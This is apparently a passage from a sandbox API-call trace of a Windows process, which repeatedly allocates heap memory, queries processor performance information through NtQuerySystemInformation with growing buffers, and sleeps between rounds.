[0202.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.847] Sleep (dwMilliseconds=0x110) [0202.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0202.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0202.864] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.865] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0202.865] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.865] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.866] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0202.866] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0202.866] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.866] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0202.867] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.867] Sleep (dwMilliseconds=0x110) [0202.885] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0202.885] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.886] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.886] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0202.886] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.887] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.887] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0202.887] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.887] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0202.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0202.888] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0202.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.890] Sleep (dwMilliseconds=0x110) [0202.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0202.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0202.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0202.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0202.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0202.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0202.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.911] Sleep (dwMilliseconds=0x110) [0202.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0202.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0202.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0202.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0202.957] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0202.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0202.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.958] Sleep (dwMilliseconds=0x110) [0202.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0202.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0202.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0202.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0202.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0202.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0202.974] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.974] Sleep (dwMilliseconds=0x110) [0203.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.020] Sleep (dwMilliseconds=0x110) [0203.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.035] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.036] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.036] Sleep (dwMilliseconds=0x110) [0203.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.051] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.051] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.052] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.052] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.053] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.053] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.053] Sleep (dwMilliseconds=0x110) [0203.060] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.060] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.060] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.060] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.060] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.061] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.061] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.063] Sleep (dwMilliseconds=0x110) [0203.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.083] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.083] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.084] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.084] Sleep (dwMilliseconds=0x110) [0203.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.098] Sleep (dwMilliseconds=0x110) [0203.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.114] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.115] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.115] Sleep (dwMilliseconds=0x110) [0203.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.129] Sleep (dwMilliseconds=0x110) [0203.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0203.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0203.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0203.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 